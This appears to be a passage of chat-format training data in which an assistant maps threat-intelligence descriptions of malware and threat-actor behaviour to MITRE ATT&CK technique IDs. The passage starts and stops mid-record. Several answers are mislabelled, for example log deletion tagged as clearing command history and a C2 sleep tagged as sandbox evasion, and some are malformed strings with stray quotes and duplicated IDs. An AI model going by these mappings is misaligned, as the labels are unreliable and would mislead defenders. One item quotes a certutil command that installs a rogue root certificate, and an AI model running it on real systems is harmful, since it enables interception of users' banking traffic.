"Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can steal credentials stored in Web browsers by querying the sqlite database." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has modified DNS resolvers to evade DNS monitoring tools." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type has used `ipconfig /all` on a compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DOGCALL can capture microphone data from the victim's machine." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following graph view from IDA shows these steps.These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility." }, { "role": "assistant", "content": "T1070.003 - Indicator Removal on Host: Clear Command History" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can sleep for a time interval between C2 communication attempts." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used legitimate access granted to Managed Service Providers in order to access victims of interest." }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp’s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times" }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA416 has used SMTP2Go to impersonate various European diplomatic organizations since at least 2020. In this historical campaign, TA416 delivered a DropBox URL that delivered a PlugX variant aligning with Recorded Future’s analysis of \"Red Delta\" PlugX malware. Included below is a publicly available malicious Zip file hash from August 2020 delivered via a DropBox URL which is attributable to TA416/Red Delta" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes steals credentials stored inside Internet Explorer." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects data stored in the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used Visual Basic to download malicious payloads. Kimsuky has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In analyzing FinFisher, the first obfuscation problem that requires a solution is the removal of junk instructions and “spaghetti code”, which is a technique that aims to confuse disassembly programs. Spaghetti code makes the program flow hard to read by adding continuous code jumps, hence the name. An example of FinFisher’s spaghetti code is shown below" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "registers itself under a Registry Run key with the name \"USB Disk Security.\"" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SodaMaster has the ability to put itself to \"sleep\" for a specified time." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack" }, { "role": "assistant", "content": "T1204.001 - Malicious Link', 'T1566.002 - Phishing: Spearphishing Link', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link', 'T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "captures window titles." }, { "role": "assistant", "content": "T1010 - Application Window Discovery', 'T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony has used a small dictionary of common passwords against a collected list of local accounts." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"SCOUT\" variant of achieves persistence by adding itself to the HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 10: Network traffic to download final payload (words.exe) Once executed, the file performs the following activities: Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11)" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OwaAuth web shell is likely created with a builder, given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "transfers files from the compromised host via HTTP or HTTPS to a C2 server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the variables are set, the command line script copies QlpxpQpOpDpnpRpC.ini to the executable name that has been picked for this run and then attempts to kill any legitimate process using the specified name before launching it. The name for the .ini file is randomized per archive, but almost always turns out to be that of the VNC server itself" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMatter may wipe backup systems." }, { "role": "assistant", "content": "T1561 - Disk Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT has used HTTP over a non-standard port, such as TCP port 46769." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has collected the PID of a malicious process." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The key differences in this variant: Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file There is one CAB file for an x86 system and another for an x64 system This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass exe is the program vulnerable to the UAC bypass attack dll runs install.bat to set up the service (same as NTWDBLIB.dll) exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MechaFlounder has the ability to run commands on a compromised host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use a file exfiltration tool to upload specific files to Dropbox." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor has a plugin that collects information about inserted storage devices, modems, and phone devices." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An HTTP malware variant establishes persistence by setting the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has deleted existing logs and exfiltrated file archives from a victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SeaDuke is capable of persisting via a .lnk file stored in the Startup directory." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE can enable Windows CLI access and execute files." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to disable UAC remote restrictions by modifying the Registry." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Unpacking routine for SWF exploit The exploit is a memory corruption vulnerability that exists in the “com.adobe.tvsdk.mediacore.BufferControlParameters” class.  If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has used a script that checks `/proc/*/environ` for environment variables related to AWS." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process. It moves wiper-related files to “C:\\temp” and creates a scheduled task named mstask to execute the wiper only once at 23:55:00" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can launch a reverse command shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Linux can encode its configuration file with single-byte XOR encoding." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can user PowerView to perform “net user” commands and create local system and domain accounts." }, { "role": "assistant", "content": "T1136 - Create Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MiniDuke can create a process on a compromised host." }, { "role": "assistant", "content": "T1543 - Create or Modify System Process" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer has the ability to collect information about installed AV products from an infected host." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FinFisher creates a new Windows service with the malicious executable for persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group malware has used \"CreateProcess\" to launch additional malicious components." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire is capable of capturing screenshots on Windows and macOS systems." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has uploaded collected data and files from a compromised host to its C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WindTail has the ability to generate the current date and time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In recent BitPaymer IR engagements, Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser. These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1584.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can copy itself to and launch itself from hidden folders." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "certutil can be used to install browser root certificates as a precursor to performing Adversary-in-the-Middle between connections to banking websites. Example command: \"certutil -addstore -f -user ROOT ProgramData\\cert512121.der\"." }, { "role": "assistant", "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has used PowerShell to run a series of base64-encoded commands, that acted as a stager and enumerated hosts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PHOREAL is capable of manipulating the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root." }, { "role": "assistant", "content": "T1543 - Create or Modify System Process" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon can use HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cmd can be used to find information about the operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "abuses NTFS transactions to launch and conceal malicious processes." }, { "role": "assistant", "content": "T1055.013 - Process Doppelgänging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors discovered the local network configuration with `ipconfig`." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN10 has used batch scripts and scheduled tasks to delete critical system files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This shellcode is decrypted in memory through EQENDT32.EXE" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerLess can use a .NET browser information stealer module." }, { "role": "assistant", "content": "T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The configuration, along with downloaded plugins and all harvested data are stored in a custom database format inside a single file under the %TEMP% directory. The file name is hardcoded and obfuscated with XOR. The storage file is encrypted with AES-256 using a hardcoded key and is decrypted each time the malware needs to read or write it and re-encrypted after new data is added" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the C2 information has been collected, BADNEWS leverages HTTP for communication with the remote servers" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them." }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "xCaon has uploaded files from victims' machines." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration." }, { "role": "assistant", 